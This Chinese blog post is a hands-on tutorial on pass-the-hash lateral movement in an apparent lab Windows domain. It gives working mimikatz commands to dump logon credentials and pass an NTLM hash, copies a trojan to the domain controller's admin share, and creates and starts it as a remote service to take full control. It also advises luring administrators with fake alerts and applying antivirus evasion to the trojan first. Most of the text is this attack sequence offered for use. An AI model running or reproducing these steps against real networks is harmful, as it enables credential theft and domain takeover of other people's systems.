讲解哈希传递攻击原理的研究并实战

一、背景:

内网渗透过程中,当获取到某个管理员用户的密码 hash 值却无法解密时,可以通过哈希传递攻击(Pass The Hash)对内网其他机器进行横向渗透。

二、使用:

1、测试环境

  • 域信息:
    • 域名:tech.com
    • 主域控(PDC):192.168.30.149
  • 拿下一台域内设备,并通过本地提权到管理权限
    • mimikatz需要使用管理员权限才能运行
图片[1]-讲解哈希传递攻击原理的研究并实战-一只薛眠羊
  • 管理账户登录过该靶机
    • 未登录可以采用制造告警来引诱管理员登录该设备解决问题,从而捕获到该管理员的账户信息
  • 两个域管理员账户:administrator / test
    • 判断命令:net group "domain admins" /domain
    • 释义:获取域内所有属于管理组的账户昵称
图片[2]-讲解哈希传递攻击原理的研究并实战-一只薛眠羊

2、攻击测试

  • mimikatz:下载
  • 注:mimikatz需要使用管理员权限执行!
  • 获取账户的密码或哈希
    • mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"
图片[3]-讲解哈希传递攻击原理的研究并实战-一只薛眠羊
  • 进行传递hash攻击
    • mimikatz "privilege::debug" "sekurlsa::pth /user:test /domain:tech.com /ntlm:224b59e0267ee26ca2313c1d2"
    • 注:个人测试请修改 user、domain、ntlm对应信息!
图片[4]-讲解哈希传递攻击原理的研究并实战-一只薛眠羊

3、上传木马

  • copy artifact.exe \\192.168.30.149\c$
    • 将 artifact.exe 复制到域控主机上
图片[5]-讲解哈希传递攻击原理的研究并实战-一只薛眠羊

4、启动木马

  • sc \\192.168.30.149 create shell binpath= "c:\artifact.exe"
    • 在主域控上创建服务,执行木马程序(仅创建,不启动)
  • sc \\192.168.30.149 start shell
    • 在主域控上启动先前创建的木马服务

5、结果

  • 通过于PDC(主域控)执行SC命令,成功上传并运行了木马,获取到了域控的最高权限!
  • 注意:在上传木马之前,请一定做临时免杀处理!
图片[6]-讲解哈希传递攻击原理的研究并实战-一只薛眠羊

三、参考资料:

© 版权声明
THE END
喜欢就支持一下吧
点赞5赞赏 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容